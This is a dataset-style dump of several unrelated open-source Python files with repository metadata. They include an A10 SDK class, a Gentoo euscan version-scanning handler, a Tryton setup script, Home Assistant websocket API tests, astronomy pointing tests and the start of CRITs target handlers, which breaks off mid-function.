code
stringlengths 3
1.05M
| repo_name
stringlengths 5
104
| path
stringlengths 4
251
| language
stringclasses 1
value | license
stringclasses 15
values | size
int64 3
1.05M
|
|---|---|---|---|---|---|
from a10sdk.common.A10BaseClass import A10BaseClass
class AuthSamlIdp(A10BaseClass):
""" :param saml_idp_name: {"description": "Local IDP metadata name", "format": "string", "minLength": 1, "optional": true, "maxLength": 63, "type": "string"}
:param DeviceProxy: The device proxy for REST operations and session handling. Refer to `common/device_proxy.py`
Class Description::
SAML metadata of identity provider.
Class auth-saml-idp supports CRUD Operations and inherits from `common/A10BaseClass`.
This class is the `"PARENT"` class for this module.`
URL for this object::
`https://<Hostname|Ip address>//axapi/v3/delete/auth-saml-idp`.
"""
def __init__(self, **kwargs):
self.ERROR_MSG = ""
self.required=[]
self.b_key = "auth-saml-idp"
self.a10_url="/axapi/v3/delete/auth-saml-idp"
self.DeviceProxy = ""
self.saml_idp_name = ""
for keys, value in kwargs.items():
setattr(self,keys, value)
|
amwelch/a10sdk-python
|
a10sdk/core/delete/delete_auth_saml_idp.py
|
Python
|
apache-2.0
| 1,028
|
# -*- coding: utf-8 -*-
# 15/6/10
# create by: snower
|
snower/forsun
|
forsun/servers/__init__.py
|
Python
|
mit
| 53
|
from urlparse import urljoin, urlparse
import urllib2
import re
import StringIO
import difflib
try:
from BeautifulSoup import BeautifulSoup
except ImportError:
from bs4 import BeautifulSoup
import portage
from euscan import output, helpers, mangling, CONFIG, SCANDIR_BLACKLIST_URLS, \
BRUTEFORCE_BLACKLIST_PACKAGES, BRUTEFORCE_BLACKLIST_URLS
HANDLER_NAME = "generic"
CONFIDENCE = 45
PRIORITY = 0
BRUTEFORCE_HANDLER_NAME = "brute_force"
BRUTEFORCE_CONFIDENCE = 30
def confidence_score(found, original, minimum=CONFIDENCE):
found_p = urlparse(found)
original_p = urlparse(original)
# check if the base url is the same
if found_p.netloc != original_p.netloc:
return minimum
# check if the directory depth is the same
if len(found_p.path.split("/")) != len(original_p.path.split("/")):
return minimum
# strip numbers
found_path = re.sub(r"[\d+\.]?", "", found_p.path)
original_path = re.sub(r"[\d+\.]?", "", original_p.path)
# strip the first equal part of the path
i = 0
max_i = len(found_path)
while i < max_i and found_path[i] == original_path[i]:
i += 1
found_path = found_path[i:]
original_path = original_path[i:]
# calculate difference ratio
diff = difflib.SequenceMatcher(None, found_path, original_path).ratio()
return int(minimum + minimum * diff) # maximum score is minimum * 2
def scan_html(data, url, pattern):
soup = BeautifulSoup(data)
results = []
for link in soup.findAll('a'):
href = link.get("href")
if not href:
continue
if href.startswith(url):
href = href.replace(url, "", 1)
match = re.search(pattern, href, re.I)
if match:
results.append(
(".".join([x for x in match.groups() if x is not None]),
match.group(0))
)
return results
def scan_ftp(data, url, pattern):
buf = StringIO.StringIO(data)
results = []
for line in buf.readlines():
line = line.replace("\n", "").replace("\r", "")
match = re.search(pattern, line, re.I)
if match:
results.append(
(".".join([x for x in match.groups() if x is not None]),
match.group(0))
)
return results
def scan_directory_recursive(cp, ver, rev, url, steps, orig_url, options):
if not steps:
return []
url += steps[0][0]
pattern = steps[0][1]
steps = steps[1:]
output.einfo("Scanning: %s" % url)
try:
fp = helpers.urlopen(url)
except urllib2.URLError:
return []
except IOError:
return []
if not fp:
return []
data = fp.read()
results = []
if re.search("<\s*a\s+[^>]*href", data, re.I):
results.extend(scan_html(data, url, pattern))
elif url.startswith('ftp://'):
results.extend(scan_ftp(data, url, pattern))
versions = []
for up_pv, path in results:
pv = mangling.mangle_version(up_pv, options)
if helpers.version_filtered(cp, ver, pv):
continue
if not url.endswith("/"):
url = url + "/"
path = urljoin(url, path)
if not steps and path not in orig_url:
confidence = confidence_score(path, orig_url)
path = mangling.mangle_url(path, options)
versions.append((path, pv, HANDLER_NAME, confidence))
if steps:
ret = scan_directory_recursive(cp, ver, rev, path, steps, orig_url,
options)
versions.extend(ret)
return versions
def scan_url(pkg, url, options):
if CONFIG["scan-dir"]:
for bu in SCANDIR_BLACKLIST_URLS:
if re.match(bu, url):
output.einfo("%s is blacklisted by rule %s" % (url, bu))
return []
resolved_url = helpers.parse_mirror(url)
if not resolved_url:
return []
cp, ver, rev = portage.pkgsplit(pkg.cpv)
# 'Hack' for _beta/_rc versions where _ is used instead of -
if ver not in resolved_url:
newver = helpers.version_change_end_sep(ver)
if newver and newver in resolved_url:
output.einfo(
"Version: using %s instead of %s" % (newver, ver)
)
ver = newver
template = helpers.template_from_url(resolved_url, ver)
if '${' not in template:
output.einfo(
"Url doesn't seems to depend on version: %s not found in %s" %
(ver, resolved_url)
)
return []
else:
output.einfo("Scanning: %s" % template)
steps = helpers.generate_scan_paths(template)
ret = scan_directory_recursive(cp, ver, rev, "", steps, url, options)
if not ret:
ret = brute_force(pkg, url)
return ret
def brute_force(pkg, url):
if CONFIG["brute-force"] == 0:
return []
cp, ver, rev = portage.pkgsplit(pkg.cpv)
url = helpers.parse_mirror(url)
if not url:
return []
for bp in BRUTEFORCE_BLACKLIST_PACKAGES:
if re.match(bp, cp):
output.einfo("%s is blacklisted by rule %s" % (cp, bp))
return []
for bp in BRUTEFORCE_BLACKLIST_URLS:
if re.match(bp, url):
output.einfo("%s is blacklisted by rule %s" % (cp, bp))
return []
output.einfo("Generating version from " + ver)
components = helpers.split_version(ver)
versions = helpers.gen_versions(components, CONFIG["brute-force"])
# Remove unwanted versions
for v in versions:
if helpers.vercmp(cp, ver, helpers.join_version(v)) >= 0:
versions.remove(v)
if not versions:
output.einfo("Can't generate new versions from " + ver)
return []
template = helpers.template_from_url(url, ver)
if '${PV}' not in template:
output.einfo(
"Url doesn't seems to depend on full version: %s not found in %s" %
(ver, url))
return []
else:
output.einfo("Brute forcing: %s" % template)
result = []
i = 0
done = []
while i < len(versions):
components = versions[i]
i += 1
if components in done:
continue
done.append(tuple(components))
version = helpers.join_version(components)
if helpers.version_filtered(cp, ver, version):
continue
try_url = helpers.url_from_template(template, version)
infos = helpers.tryurl(try_url, template)
if not infos:
continue
confidence = confidence_score(try_url, url,
minimum=BRUTEFORCE_CONFIDENCE)
result.append([try_url, version, BRUTEFORCE_HANDLER_NAME, confidence])
if len(result) > CONFIG['brute-force-false-watermark']:
output.einfo(
"Broken server detected ! Skipping brute force."
)
return []
if CONFIG["brute-force-recursive"]:
for v in helpers.gen_versions(list(components),
CONFIG["brute-force"]):
if v not in versions and tuple(v) not in done:
versions.append(v)
if CONFIG["oneshot"]:
break
return result
def can_handle(pkg, url):
return True
|
iksaif/euscan
|
pym/euscan/handlers/generic.py
|
Python
|
gpl-2.0
| 7,458
|
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import sessionmaker,scoped_session
from settings import DB_DIR
Base = declarative_base()
engine = create_engine(DB_DIR, echo=True)
db = scoped_session(sessionmaker(bind=engine))
|
Luffin/ThousandSunny
|
GoingMerry/database.py
|
Python
|
mit
| 293
|
#!/usr/bin/env python
# This file is part company_logo module for Tryton.
# The COPYRIGHT file at the top level of this repository contains
# the full copyright notices and license terms.
from setuptools import setup
import re
import os
import io
try:
from configparser import ConfigParser
except ImportError:
from ConfigParser import ConfigParser
MODULE2PREFIX = {}
def read(fname):
return io.open(
os.path.join(os.path.dirname(__file__), fname),
'r', encoding='utf-8').read()
def get_require_version(name):
if minor_version % 2:
require = '%s >= %s.%s.dev0, < %s.%s'
else:
require = '%s >= %s.%s, < %s.%s'
require %= (name, major_version, minor_version,
major_version, minor_version + 1)
return require
config = ConfigParser()
config.readfp(open('tryton.cfg'))
info = dict(config.items('tryton'))
for key in ('depends', 'extras_depend', 'xml'):
if key in info:
info[key] = info[key].strip().splitlines()
version = info.get('version', '0.0.1')
major_version, minor_version, _ = version.split('.', 2)
major_version = int(major_version)
minor_version = int(minor_version)
name = 'trytonspain_company_logo'
download_url = 'https://bitbucket.org/trytonspain/trytond-company_logo'
requires = []
for dep in info.get('depends', []):
if not re.match(r'(ir|res)(\W|$)', dep):
prefix = MODULE2PREFIX.get(dep, 'trytond')
requires.append(get_require_version('%s_%s' % (prefix, dep)))
requires.append(get_require_version('trytond'))
tests_require = []
dependency_links = []
if minor_version % 2:
# Add development index for testing with proteus
dependency_links.append('https://trydevpi.tryton.org/')
setup(name=name,
version=version,
description='Tryton Company Logo Module',
long_description=read('README'),
author='TrytonSpain',
author_email='',
url='https://bitbucket.org/trytonspain/',
download_url=download_url,
keywords='',
package_dir={'trytond.modules.company_logo': '.'},
packages=[
'trytond.modules.company_logo',
'trytond.modules.company_logo.tests',
],
package_data={
'trytond.modules.company_logo': (info.get('xml', [])
+ ['tryton.cfg', 'view/*.xml', 'locale/*.po', '*.odt',
'icons/*.svg', 'tests/*.rst']),
},
classifiers=[
'Development Status :: 5 - Production/Stable',
'Environment :: Plugins',
'Framework :: Tryton',
'Intended Audience :: Developers',
'Intended Audience :: Financial and Insurance Industry',
'Intended Audience :: Legal Industry',
'License :: OSI Approved :: GNU General Public License (GPL)',
'Natural Language :: Bulgarian',
'Natural Language :: Catalan',
'Natural Language :: Czech',
'Natural Language :: Dutch',
'Natural Language :: English',
'Natural Language :: French',
'Natural Language :: German',
'Natural Language :: Hungarian',
'Natural Language :: Italian',
'Natural Language :: Portuguese (Brazilian)',
'Natural Language :: Russian',
'Natural Language :: Slovenian',
'Natural Language :: Spanish',
'Operating System :: OS Independent',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3.3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: CPython',
'Programming Language :: Python :: Implementation :: PyPy',
'Topic :: Office/Business',
],
license='GPL-3',
install_requires=requires,
dependency_links=dependency_links,
zip_safe=False,
entry_points="""
[trytond.modules]
company_logo = trytond.modules.company_logo
""",
test_suite='tests',
test_loader='trytond.test_loader:Loader',
tests_require=tests_require,
use_2to3=True,
)
|
ferjavrec/company_logo
|
setup.py
|
Python
|
gpl-3.0
| 3,994
|
"""Tests for WebSocket API commands."""
from async_timeout import timeout
from homeassistant.components.websocket_api import const
from homeassistant.components.websocket_api.auth import (
TYPE_AUTH,
TYPE_AUTH_OK,
TYPE_AUTH_REQUIRED,
)
from homeassistant.components.websocket_api.const import URL
from homeassistant.core import callback
from homeassistant.exceptions import HomeAssistantError
from homeassistant.loader import async_get_integration
from homeassistant.setup import async_setup_component
from tests.common import async_mock_service
async def test_call_service(hass, websocket_client):
"""Test call service command."""
calls = []
@callback
def service_call(call):
calls.append(call)
hass.services.async_register("domain_test", "test_service", service_call)
await websocket_client.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "test_service",
"service_data": {"hello": "world"},
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert len(calls) == 1
call = calls[0]
assert call.domain == "domain_test"
assert call.service == "test_service"
assert call.data == {"hello": "world"}
async def test_call_service_not_found(hass, websocket_client):
"""Test call service command."""
await websocket_client.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "test_service",
"service_data": {"hello": "world"},
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == const.ERR_NOT_FOUND
async def test_call_service_child_not_found(hass, websocket_client):
"""Test not reporting not found errors if it's not the called service."""
async def serv_handler(call):
await hass.services.async_call("non", "existing")
hass.services.async_register("domain_test", "test_service", serv_handler)
await websocket_client.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "test_service",
"service_data": {"hello": "world"},
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == const.ERR_HOME_ASSISTANT_ERROR
async def test_call_service_error(hass, websocket_client):
"""Test call service command with error."""
@callback
def ha_error_call(_):
raise HomeAssistantError("error_message")
hass.services.async_register("domain_test", "ha_error", ha_error_call)
async def unknown_error_call(_):
raise ValueError("value_error")
hass.services.async_register("domain_test", "unknown_error", unknown_error_call)
await websocket_client.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "ha_error",
}
)
msg = await websocket_client.receive_json()
print(msg)
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"] is False
assert msg["error"]["code"] == "home_assistant_error"
assert msg["error"]["message"] == "error_message"
await websocket_client.send_json(
{
"id": 6,
"type": "call_service",
"domain": "domain_test",
"service": "unknown_error",
}
)
msg = await websocket_client.receive_json()
print(msg)
assert msg["id"] == 6
assert msg["type"] == const.TYPE_RESULT
assert msg["success"] is False
assert msg["error"]["code"] == "unknown_error"
assert msg["error"]["message"] == "value_error"
async def test_subscribe_unsubscribe_events(hass, websocket_client):
"""Test subscribe/unsubscribe events command."""
init_count = sum(hass.bus.async_listeners().values())
await websocket_client.send_json(
{"id": 5, "type": "subscribe_events", "event_type": "test_event"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
# Verify we have a new listener
assert sum(hass.bus.async_listeners().values()) == init_count + 1
hass.bus.async_fire("ignore_event")
hass.bus.async_fire("test_event", {"hello": "world"})
hass.bus.async_fire("ignore_event")
with timeout(3):
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event["event_type"] == "test_event"
assert event["data"] == {"hello": "world"}
assert event["origin"] == "LOCAL"
await websocket_client.send_json(
{"id": 6, "type": "unsubscribe_events", "subscription": 5}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 6
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
# Check our listener got unsubscribed
assert sum(hass.bus.async_listeners().values()) == init_count
async def test_get_states(hass, websocket_client):
"""Test get_states command."""
hass.states.async_set("greeting.hello", "world")
hass.states.async_set("greeting.bye", "universe")
await websocket_client.send_json({"id": 5, "type": "get_states"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
states = []
for state in hass.states.async_all():
state = state.as_dict()
state["last_changed"] = state["last_changed"].isoformat()
state["last_updated"] = state["last_updated"].isoformat()
states.append(state)
assert msg["result"] == states
async def test_get_services(hass, websocket_client):
"""Test get_services command."""
await websocket_client.send_json({"id": 5, "type": "get_services"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert msg["result"] == hass.services.async_services()
async def test_get_config(hass, websocket_client):
"""Test get_config command."""
await websocket_client.send_json({"id": 5, "type": "get_config"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
if "components" in msg["result"]:
msg["result"]["components"] = set(msg["result"]["components"])
if "whitelist_external_dirs" in msg["result"]:
msg["result"]["whitelist_external_dirs"] = set(
msg["result"]["whitelist_external_dirs"]
)
if "allowlist_external_dirs" in msg["result"]:
msg["result"]["allowlist_external_dirs"] = set(
msg["result"]["allowlist_external_dirs"]
)
if "allowlist_external_urls" in msg["result"]:
msg["result"]["allowlist_external_urls"] = set(
msg["result"]["allowlist_external_urls"]
)
assert msg["result"] == hass.config.as_dict()
async def test_ping(websocket_client):
"""Test get_panels command."""
await websocket_client.send_json({"id": 5, "type": "ping"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "pong"
async def test_call_service_context_with_user(hass, aiohttp_client, hass_access_token):
"""Test that the user is set in the service call context."""
assert await async_setup_component(hass, "websocket_api", {})
calls = async_mock_service(hass, "domain_test", "test_service")
client = await aiohttp_client(hass.http.app)
async with client.ws_connect(URL) as ws:
auth_msg = await ws.receive_json()
assert auth_msg["type"] == TYPE_AUTH_REQUIRED
await ws.send_json({"type": TYPE_AUTH, "access_token": hass_access_token})
auth_msg = await ws.receive_json()
assert auth_msg["type"] == TYPE_AUTH_OK
await ws.send_json(
{
"id": 5,
"type": "call_service",
"domain": "domain_test",
"service": "test_service",
"service_data": {"hello": "world"},
}
)
msg = await ws.receive_json()
assert msg["success"]
refresh_token = await hass.auth.async_validate_access_token(hass_access_token)
assert len(calls) == 1
call = calls[0]
assert call.domain == "domain_test"
assert call.service == "test_service"
assert call.data == {"hello": "world"}
assert call.context.user_id == refresh_token.user.id
async def test_subscribe_requires_admin(websocket_client, hass_admin_user):
"""Test subscribing events without being admin."""
hass_admin_user.groups = []
await websocket_client.send_json(
{"id": 5, "type": "subscribe_events", "event_type": "test_event"}
)
msg = await websocket_client.receive_json()
assert not msg["success"]
assert msg["error"]["code"] == const.ERR_UNAUTHORIZED
async def test_states_filters_visible(hass, hass_admin_user, websocket_client):
"""Test we only get entities that we're allowed to see."""
hass_admin_user.mock_policy({"entities": {"entity_ids": {"test.entity": True}}})
hass.states.async_set("test.entity", "hello")
hass.states.async_set("test.not_visible_entity", "invisible")
await websocket_client.send_json({"id": 5, "type": "get_states"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert len(msg["result"]) == 1
assert msg["result"][0]["entity_id"] == "test.entity"
async def test_get_states_not_allows_nan(hass, websocket_client):
"""Test get_states command not allows NaN floats."""
hass.states.async_set("greeting.hello", "world", {"hello": float("NaN")})
await websocket_client.send_json({"id": 5, "type": "get_states"})
msg = await websocket_client.receive_json()
assert not msg["success"]
assert msg["error"]["code"] == const.ERR_UNKNOWN_ERROR
async def test_subscribe_unsubscribe_events_whitelist(
hass, websocket_client, hass_admin_user
):
"""Test subscribe/unsubscribe events on whitelist."""
hass_admin_user.groups = []
await websocket_client.send_json(
{"id": 5, "type": "subscribe_events", "event_type": "not-in-whitelist"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == "unauthorized"
await websocket_client.send_json(
{"id": 6, "type": "subscribe_events", "event_type": "themes_updated"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 6
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
hass.bus.async_fire("themes_updated")
with timeout(3):
msg = await websocket_client.receive_json()
assert msg["id"] == 6
assert msg["type"] == "event"
event = msg["event"]
assert event["event_type"] == "themes_updated"
assert event["origin"] == "LOCAL"
async def test_subscribe_unsubscribe_events_state_changed(
hass, websocket_client, hass_admin_user
):
"""Test subscribe/unsubscribe state_changed events."""
hass_admin_user.groups = []
hass_admin_user.mock_policy({"entities": {"entity_ids": {"light.permitted": True}}})
await websocket_client.send_json(
{"id": 7, "type": "subscribe_events", "event_type": "state_changed"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 7
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
hass.states.async_set("light.not_permitted", "on")
hass.states.async_set("light.permitted", "on")
msg = await websocket_client.receive_json()
assert msg["id"] == 7
assert msg["type"] == "event"
assert msg["event"]["event_type"] == "state_changed"
assert msg["event"]["data"]["entity_id"] == "light.permitted"
async def test_render_template_renders_template(
hass, websocket_client, hass_admin_user
):
"""Test simple template is rendered and updated."""
hass.states.async_set("light.test", "on")
await websocket_client.send_json(
{
"id": 5,
"type": "render_template",
"template": "State is: {{ states('light.test') }}",
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event == {"result": "State is: on"}
hass.states.async_set("light.test", "off")
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event == {"result": "State is: off"}
async def test_render_template_with_manual_entity_ids(
hass, websocket_client, hass_admin_user
):
"""Test that updates to specified entity ids cause a template rerender."""
hass.states.async_set("light.test", "on")
hass.states.async_set("light.test2", "on")
await websocket_client.send_json(
{
"id": 5,
"type": "render_template",
"template": "State is: {{ states('light.test') }}",
"entity_ids": ["light.test2"],
}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event == {"result": "State is: on"}
hass.states.async_set("light.test2", "off")
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == "event"
event = msg["event"]
assert event == {"result": "State is: on"}
async def test_render_template_returns_with_match_all(
hass, websocket_client, hass_admin_user
):
"""Test that a template that would match with all entities still return success."""
await websocket_client.send_json(
{"id": 5, "type": "render_template", "template": "State is: {{ 42 }}"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
async def test_manifest_list(hass, websocket_client):
"""Test loading manifests."""
http = await async_get_integration(hass, "http")
websocket_api = await async_get_integration(hass, "websocket_api")
await websocket_client.send_json({"id": 5, "type": "manifest/list"})
msg = await websocket_client.receive_json()
assert msg["id"] == 5
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert sorted(msg["result"], key=lambda manifest: manifest["domain"]) == [
http.manifest,
websocket_api.manifest,
]
async def test_manifest_get(hass, websocket_client):
"""Test getting a manifest."""
hue = await async_get_integration(hass, "hue")
await websocket_client.send_json(
{"id": 6, "type": "manifest/get", "integration": "hue"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 6
assert msg["type"] == const.TYPE_RESULT
assert msg["success"]
assert msg["result"] == hue.manifest
# Non existing
await websocket_client.send_json(
{"id": 7, "type": "manifest/get", "integration": "non_existing"}
)
msg = await websocket_client.receive_json()
assert msg["id"] == 7
assert msg["type"] == const.TYPE_RESULT
assert not msg["success"]
assert msg["error"]["code"] == "not_found"
|
mKeRix/home-assistant
|
tests/components/websocket_api/test_commands.py
|
Python
|
mit
| 16,345
|
# Licensed under GPL version 3 - see LICENSE.rst
import numpy as np
from astropy.table import Table
from astropy.coordinates import SkyCoord
import astropy.units as u
from scipy.stats import pearsonr
import pytest
from ...source import FixedPointing, JitterPointing, PointSource
def test_reference_coordiante_system():
'''Usually, rays that are on-axis will come in along the x-axis.
Test a simulations with a different coordinate system.'''
s = PointSource(coords=SkyCoord(12., 34., unit='deg'))
photons = s.generate_photons(5)
point_x = FixedPointing(coords=SkyCoord(12., 34., unit='deg'))
p_x = point_x(photons.copy())
assert np.allclose(p_x['dir'].data[:, 0], -1.)
assert np.allclose(p_x['dir'].data[:, 1:], 0)
xyz2zxy = np.array([[0., 0, 1, 0], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1]]).T
point_z = FixedPointing(coords=SkyCoord(12., 34., unit='deg'), reference_transform=xyz2zxy)
p_z = point_z(photons.copy())
assert np.allclose(p_z['dir'].data[:, 2], -1.)
assert np.allclose(p_z['dir'].data[:, :2], 0)
def test_polarization_direction():
'''Test that a FixedPointing correctly assigns linear polarization vectors.'''
s = PointSource(coords=SkyCoord(187.4, 0., unit='deg'))
photons = s.generate_photons(5)
photons['polangle'] = (np.array([0., 90., 180., 270., 45.])) * u.deg.to(photons['polangle'].unit)
point_x = FixedPointing(coords=SkyCoord(187.4, 0., unit='deg'))
p_x = point_x(photons.copy())
# For a simple polangle 0 = 180 and the direction does not matter.
# However with a view to eliptical polarization in the future we want
# to fix the absolute phase, too.
assert np.allclose(p_x['polarization'].data[0, :], [0, 0, 1, 0])
assert np.allclose(p_x['polarization'].data[1, :], [0, 1, 0, 0])
assert np.allclose(p_x['polarization'].data[2, :], [0, 0, -1, 0])
assert np.allclose(p_x['polarization'].data[3, :], [0, -1, 0, 0])
assert np.allclose(p_x['polarization'].data[4, :], [0, 1/np.sqrt(2), 1/np.sqrt(2), 0])
xyz2zxy = np.array([[0., 0, 1, 0], [1, 0, 0, 0], [0, 1, 0, 0], [0, 0, 0, 1]]).T
point_z = FixedPointing(coords=SkyCoord(187.4, 0., unit='deg'), reference_transform=xyz2zxy)
p_z = point_z(photons.copy())
assert np.allclose(p_z['polarization'].data[0, :], [0, 1, 0, 0])
assert np.allclose(p_z['polarization'].data[1, :], [1, 0, 0, 0])
assert np.allclose(p_z['polarization'].data[4, :], [1/np.sqrt(2), 1/np.sqrt(2), 0, 0])
# Photons pointing east with the same RA will have parallel polarization vectors
# This is true for all pointing directions.
s = PointSource(coords=SkyCoord(22.5, 0., unit='deg'))
photons = s.generate_photons(5)
photons['dec'] = [67., 23., 0., -45.454, -67.88]
photons['polangle'] = (90. * u.deg).to(photons['polangle'].unit)
point = FixedPointing(coords=SkyCoord(94.3, 23., unit='deg'))
p = point(photons.copy())
for i in range(1, len(p)):
assert np.isclose(np.dot(p['polarization'][0], p['polarization'][i]), 1)
def test_jitter():
'''test size and randomness of jitter'''
n = 100000
ra = np.random.rand(n) * 2 * np.pi
# Note that my rays are not evenly distributed on the sky.
# No need to be extra fancy here, it's probably even better for
# a test to have more scrutiny around the poles.
dec = (np.random.rand(n) * 2. - 1.) / 2. * np.pi
time = np.arange(n)
pol = np.ones_like(ra)
prob = np.ones_like(ra)
photons = Table([ra, dec, time, pol, prob],
names=['ra', 'dec', 'time', 'polangle', 'probability'])
fixed = FixedPointing(coords = SkyCoord(25., -10., unit='deg'))
jittered = JitterPointing(coords = SkyCoord(25., -10., unit='deg'),
jitter=1. * u.arcsec)
p_fixed = fixed(photons.copy())
p_jitter = jittered(photons)
assert np.allclose(np.linalg.norm(p_fixed['dir'], axis=1), 1.)
assert np.allclose(np.linalg.norm(p_jitter['dir'], axis=1), 1.)
prod = np.sum(p_fixed['dir'] * p_jitter['dir'], axis=1)
# sum can give values > 1 due to rounding errors
# That would make arccos fail, so catch those here
ind = prod > 1.
if ind.sum() > 0:
prod[ind] = 1.
alpha = np.arccos(prod)
# in this formula alpha will always be the abs(angle).
# Flip some signs to recover input normal distribtution.
alpha *= np.sign(np.random.rand(n)-0.5)
# center?
assert np.abs(np.mean(alpha)) * 3600. < 0.01
# Is right size?
assert np.std(np.rad2deg(alpha)) > (0.9 / 3600.)
assert np.std(np.rad2deg(alpha)) < (1.1 / 3600.)
# Does it affect y and z independently?
coeff, p = pearsonr(p_fixed['dir'][:, 1] - p_jitter['dir'][:, 1],
p_fixed['dir'][:, 2] - p_jitter['dir'][:, 2])
assert abs(coeff) < 0.01
@pytest.mark.parametrize('pointing', [FixedPointing, JitterPointing])
def test_polarization_perpendicular(pointing):
'''Consistency: Polarization vector must always be perpendicular to dir.'''
s = PointSource(coords=SkyCoord(0., 0., unit='deg'))
photons = s.generate_photons(10)
photons['ra'] = np.random.uniform(0, 360., len(photons))
# Exclude +-90 deg, because not handling poles well
photons['dec'] = np.random.uniform(-89.9, 89.9, len(photons))
photons['polangle'] = np.random.uniform(0, 360., len(photons))
point_x = FixedPointing(coords=SkyCoord(187.4, 0., unit='deg'))
p_x = point_x(photons.copy())
assert np.allclose(np.einsum('ij,ij->i', p_x['dir'].data,
p_x['polarization'].data), 0)
|
hamogu/marxs
|
marxs/source/tests/test_pointing.py
|
Python
|
gpl-3.0
| 5,596
|
def main():
shour = float(raw_input("Enter the starting hours "))
smin = float(raw_input("Enter the starting minutes "))
ehour = float(raw_input("Enter the ending hours "))
emin = float(raw_input("Enter the ending minutes: "))
cperiodh = ehour-shour
cperiodm = emin -smin
cperiodm1 = cperiodm / 60
fperiod = cperiodh + cperiodm1
if ehour < 9:
charge = fperiod * 2.50
print "Your payable ammount is %f " %(charge)
if ehour >= 9:
shour1 = (9-(shour + (smin / 60)))
ehour1 = ((ehour + (emin / 60)-9))
fcharge1 = (shour1* 2.50 )+ (ehour1 * 1.75)
print "Your payable amount is %f" %(fcharge1)
main()
|
sai29/Python-John-Zelle-book
|
Chapter_7/7.py
|
Python
|
mit
| 686
|
import json
from django.core.urlresolvers import reverse
from django.http import HttpResponse
from django.shortcuts import render_to_response
from django.template import RequestContext
from mongoengine.base import ValidationError
from crits.core import form_consts
from crits.core.crits_mongoengine import json_handler, EmbeddedCampaign
from crits.core.handlers import jtable_ajax_list, build_jtable, jtable_ajax_delete
from crits.core.handlers import csv_export
from crits.core.user_tools import is_user_subscribed, user_sources
from crits.core.user_tools import is_user_favorite
from crits.emails.email import Email
from crits.services.handlers import run_triage
from crits.stats.handlers import target_user_stats
from crits.targets.division import Division
from crits.targets.forms import TargetInfoForm
from crits.targets.target import Target
def generate_target_csv(request):
"""
Generate a CSV file of the Target information
:param request: The request for this CSV.
:type request: :class:`django.http.HttpRequest`
:returns: :class:`django.http.HttpResponse`
"""
response = csv_export(request,Target)
return response
def upsert_target(data, analyst):
"""
Add/update target information.
:param data: The target information.
:type data: dict
:param analyst: The user adding the target.
:type analyst: str
:returns: dict with keys "success" (boolean) and "message" (str)
"""
if 'email_address' not in data:
return {'success': False,
'message': "No email address to look up"}
# check for exact match first
target = Target.objects(email_address=data['email_address']).first()
if not target: # if no exact match, look for case-insensitive match
target = Target.objects(email_address__iexact=data['email_address']).first()
is_new = False
if not target:
is_new = True
target = Target()
target.email_address = data['email_address'].strip().lower()
bucket_list = False
ticket = False
if 'department' in data:
target.department = data['department']
if 'division' in data:
target.division = data['division']
if 'organization_id' in data:
target.organization_id = data['organization_id']
if 'firstname' in data:
target.firstname = data['firstname']
if 'lastname' in data:
target.lastname = data['lastname']
if 'note' in data:
target.note = data['note']
if 'title' in data:
target.title = data['title']
if 'campaign' in data and 'camp_conf' in data:
target.add_campaign(EmbeddedCampaign(name=data['campaign'],
confidence=data['camp_conf'],
analyst=analyst))
if 'bucket_list' in data:
bucket_list = data.get(form_consts.Common.BUCKET_LIST_VARIABLE_NAME)
if 'ticket' in data:
ticket = data.get(form_consts.Common.TICKET_VARIABLE_NAME)
if bucket_list:
target.add_bucket_list(bucket_list, analyst)
if ticket:
